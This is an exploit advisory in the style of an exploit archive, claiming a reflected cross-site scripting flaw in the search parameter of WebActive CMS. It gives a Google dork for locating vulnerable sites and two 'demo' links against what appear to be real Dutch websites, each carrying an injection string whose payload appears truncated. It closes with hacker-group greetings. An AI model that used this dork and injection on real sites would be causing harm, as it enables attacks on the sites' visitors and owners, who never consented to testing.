# Exploit Title: WebActive CMS Cross site Scripting Vulnerability # # Google Dork: Intext:"powered by: WebActive" # # Date: 09/04/2012 # # Author: Crim3R & Ajax Security Team # # Home : Http://WwW.AjaxTm.com/ # # Vendor Home : http://www.webactive.nl/ # # Tested on: all # ================================== [+] zoeken parametr in zoeken.php is Vulnerable to xss D3m0: http://www.door.nl/zoeken.php?zoeken="> http://muttifit.nl/doorklanten/www/door_site/zoeken.php?zoeken="> ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369